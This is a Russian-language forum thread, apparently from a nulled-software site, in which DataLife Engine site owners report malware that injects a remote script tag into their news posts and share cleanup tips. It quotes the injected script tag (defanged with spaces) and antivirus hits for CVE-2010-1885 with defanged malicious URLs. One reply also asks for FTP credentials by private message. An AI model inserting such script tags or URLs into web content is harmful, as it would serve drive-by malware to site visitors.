• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.     Помогите модератору этого раздела killoff лично.

Поиск Борьба с Вирусом

Статус
В этой теме нельзя размещать новые ответы.
Кексойд

Кексойд

Постоялец
Регистрация
2 Июн 2008
Сообщения
60
Реакции
3
Помогите. У меня сия проблема, загружаю новости все нормально, проходит какое-то время и к новости короткой и полной приписыватся скрипт.

<script src="http://gooog lle.org/77ecf8b2b0e0c8c035 0ec52877066bcb . js" type="text/javascript"></script>

Помогите найти с чего это все вылезает. Заранее спасибо
 
Давай в личку фтп и аську, могу сейчас поковырять.
 
Та же проблема.
Выяснил, что вирь прописывает себя в БД в вп-пост в конец поста - так что чистить все посты нужно :(
Как этот скрипт туда попал - пока не разобрался.
После чистки 29-го выскочил сегодня опять.. 3 дня ...
 
Смотрю у всех проблема с этим вирусом. я обновился на 9.0 надеюсь поможет)
по поводу чистки вот фаил удаляет скриптик)
 

Вложения

  • dle_malware_clean.rar
    769 байт · Просмотры: 36
Весь прикол в том что у меня и стояла 9-ка
 
- смена пароля базы (позаковырестей пароль сделайте)
- проверка всех папок на хостинге на наличие инородных папок, я смотрю по дате изменения папки (FileZilla)
- ИМХО ноги растут из темы про уязвимость DLE когда левые админы появляются.

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
 
Вирус

Движок DLE 7.3
Вот такую гадость ловлю на сайте, при этом не всегда вылазиет (плавает по сайту). Ну могу понять где она может сидеть или вообще от чего она... Может кто знает?
Самое интересное адреса расположения вируса меняются...
Вот позавчера:
Exploit.HTML.CVE-2010-1885.ad
http : // jakd. cz. cc /games/hcp_asx.php?f=110
Вот вчера:
Exploit.HTML.CVE-2010-1885.ad
http : // ded4 .cz .cc /games/hcp_asx.php?f=111
Плавает по сайту, вылазиет когда захочет...
 
Теперь становится ясно , что уязвимость скорее всего на ДЛЕ 9.0 потому, что у меня сейчас 8.5 на VPS стоит , посещалка болле 7000 ,

левых админов (слава Богу! ) нет.

8.5 сейчас stable


Всё ИМХО
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху